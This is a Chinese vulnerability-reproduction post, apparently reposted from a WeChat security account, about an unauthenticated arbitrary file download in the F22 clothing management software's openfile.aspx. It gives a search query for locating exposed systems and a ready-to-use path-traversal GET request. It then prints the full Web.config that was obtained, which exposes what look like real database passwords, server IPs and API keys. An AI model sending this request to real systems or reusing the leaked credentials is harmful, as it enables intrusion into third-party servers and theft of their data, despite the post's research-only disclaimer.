【漏洞复现】F22服装管理软件系统openfile.aspx前台任意文件下载

admin

138658
文章

114
评论

2023年11月29日11:39:03评论154 views字数 9641阅读32分8秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

漏洞描述

广州锦铭泰软件科技有限公司，是一家专业为品牌服饰鞋包企业提供信息化解决方案的高科技企业，该公司开发的F22服装管理软件系统存在接口未授权访问，通过未授权接口/oa/isprit/module/openfile.aspx存在任意文件下载漏洞。攻击者最终可利用该漏洞获取敏感信息。

资产收集

web.title:"F22WEB登陆"显示如下图的图标才是系统

【漏洞复现】F22服装管理软件系统openfile.aspx前台任意文件下载

漏洞复现

【漏洞复现】F22服装管理软件系统openfile.aspx前台任意文件下载

构造请求包

GET /oa/isprit/module/openfile.aspx?Url=......Web.config HTTP/1.1Host: Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

返回包

【漏洞复现】F22服装管理软件系统openfile.aspx前台任意文件下载

HTTP/1.1 200 OKDate: Tue, 28 Nov 2023 01:44:06 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETX-AspNet-Version: 4.0.30319Content-Disposition: attachment;filename=Web.configCache-Control: privateContent-Type: application/x-configContent-Length: 10777
<?xml version="1.0"?><!--     注意: 除了手动编辑此文件以外，您还可以使用     Web 管理工具来配置应用程序的设置。可以使用 Visual Studio 中的     “网站”->“Asp.Net 配置”选项。    设置和注释的完整列表在     machine.config.comments 中，该文件通常位于     WindowsMicrosoft.NetFrameworkv2.xConfig 中--><configuration>  <appSettings>    <add key="CrystalImageCleaner-AutoStart" value="true" />    <add key="CrystalImageCleaner-Sleep" value="60000" />    <add key="CrystalImageCleaner-Age" value="120000" />    <!--CRM配制参数改为从f18books 里按账套-->    <!--<add key="key" value="LODEPBIGBOSS^SDDE._[@##@**ZS"/>    <add key="BigBossService" value="http://218.244.156.72:56/BigBossService.svc"/>-->    <!--手机app调用参数 数据库、微信KEY-->    <add key="appDbName" value="f22x" />    <add key="appKey" value="fefd752acb51741d239dc69b73df4be8" />    <add key="apiKey" value="LODEPBIGBOSS^SDDE!()zhx" />    <add key="baiduak" value="I00klIYKAL85NZM5QoTtIf4swUUvn5Bl" />  </appSettings>  <connectionStrings>    <add name="ec" connectionString="Data Source=124.42.240.23,5280;Initial Catalog=ec;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=zhxit123" providerName="System.Data.SqlClient" />    <add name="webconn" connectionString="Data Source=.;Initial Catalog=cw3d028_db;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />    <add name="mdburl" connectionString="Data Source=.;Initial Catalog=voa;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />    <add name="f21mdb" connectionString="Data Source=.;Initial Catalog=f22j;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />    <add name="f18master" connectionString="Data Source=.;Initial Catalog=f18master;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />    <add name="f117picture" connectionString="Data Source=.;Initial Catalog=F117Picture;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />    <add name="carcn" connectionString="Data Source=.;Initial Catalog=cashcard;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />    <add name="oraconn" connectionString="DATA SOURCE=(DESCRIPTION=(CID=GTU_APP)(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=jackie-work)(PORT=1521)))(CONNECT_DATA=(SID=orcl)(SERVER=DEDICATED)));USER ID=zhxf22;PASSWORD=ml350;" providerName="System.Data.OracleClient" />  </connectionStrings>  <system.web>    <httpRuntime maxRequestLength="104857600" useFullyQualifiedRedirectUrl="false" />    <!--requestValidationMode="2.0" -->    <httpHandlers>      <add verb="*" path="openfile.aspx" type="filedown,filedown" />      <add verb="GET" path="CrystalImageHandler.aspx" type="CrystalDecisions.Web.CrystalImageHandler, CrystalDecisions.Web, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692fbea5521e1304" />    </httpHandlers>    <!--             设置 compilation debug="true" 可将调试符号插入            已编译的页面中。但由于这会             影响性能，因此只应在开发过程中设置             此值。
            Visual Basic 选项:            设置 strict="true" 将禁止所有会导致             数据丢失的类型转换。            设置 explicit="true" 将强制声明所有变量。        -->    <compilation debug="true" strict="false" explicit="true" targetFramework="4.0">      <assemblies>        <add assembly="Infragistics2.WebUI.Shared.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.UltraWebChart.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.WebHtmlEditor.v6.2, Version=6.2.20062.34, Culture=neutral,  PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.WebSchedule.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.WebNavBar.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.UltraWebToolbar.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.UltraWebGrid.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.UltraWebTab.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.WebCombo.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.WebScheduleDataProvider.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="Infragistics2.WebUI.UltraWebNavigator.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />        <add assembly="System.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.Data.OracleClient, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />        <add assembly="Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />        <add assembly="System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />        <add assembly="System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />        <add assembly="System.Web.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.DirectoryServices.Protocols, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />        <add assembly="System.Web.RegularExpressions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />        <add assembly="CrystalDecisions.CrystalReports.Engine, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />        <add assembly="CrystalDecisions.Data.AdoDotNetInterop, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />        <add assembly="CrystalDecisions.ReportSource, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />        <add assembly="CrystalDecisions.Shared, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />        <add assembly="CrystalDecisions.Web, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />        <add assembly="CrystalDecisions.Windows.Forms, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />      </assemblies>    </compilation>    <pages validateRequest="false" controlRenderingCompatibilityVersion="3.5" clientIDMode="AutoID">      <namespaces>        <clear />        <add namespace="System" />        <add namespace="System.Collections" />        <add namespace="System.Collections.Specialized" />        <add namespace="System.Configuration" />        <add namespace="System.Text" />        <add namespace="System.Text.RegularExpressions" />        <add namespace="System.Web" />        <add namespace="System.Web.Caching" />        <add namespace="System.Web.SessionState" />        <add namespace="System.Web.Security" />        <add namespace="System.Web.Profile" />        <add namespace="System.Web.UI" />        <add namespace="System.Web.UI.WebControls" />        <add namespace="System.Web.UI.WebControls.WebParts" />        <add namespace="System.Web.UI.HtmlControls" />      </namespaces>    </pages>    <!--            如果在执行请求的过程中出现未处理的错误，            则通过 <customErrors> 节可以配置相应的处理步骤。具体说来，            开发人员通过该节可以配置            要显示的 html 错误页            以代替错误堆栈跟踪。-->    <customErrors mode="off" />    <sessionState timeout="600" />    <globalization requestEncoding="utf-8" responseEncoding="utf-8" />  </system.web>  <system.webServer>    <security>      <requestFiltering>        <requestLimits maxAllowedContentLength="104857600" />      </requestFiltering>    </security>    <handlers>      <remove name="zhx" />      <add name="openfile.aspx_*" path="openfile.aspx" verb="*" type="filedown,filedown" />      <add name="CrystalImageHandler.aspx_GET" verb="GET" path="CrystalImageHandler.aspx" type="CrystalDecisions.Web.CrystalImageHandler, CrystalDecisions.Web, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692fbea5521e1304" preCondition="integratedMode" />    </handlers>    <validation validateIntegratedModeConfiguration="false" />    <defaultDocument>      <files>        <clear />        <add value="reloginzt.aspx" />        <add value="default.aspx" />        <add value="Default.htm" />        <add value="Default.asp" />        <add value="index.htm" />        <add value="index.asp" />      </files>    </defaultDocument>    <directoryBrowse enabled="false" />  </system.webServer>  <system.web.extensions>    <scripting>      <webServices>        <jsonSerialization maxJsonLength="902400000" />      </webServices>    </scripting>  </system.web.extensions></configuration>

原文始发于微信公众号（Devil安全）：【漏洞复现】F22服装管理软件系统openfile.aspx前台任意文件下载

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】F22服装管理软件系统openfile.aspx前台任意文件下载

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

发表评论

在线咨询

微信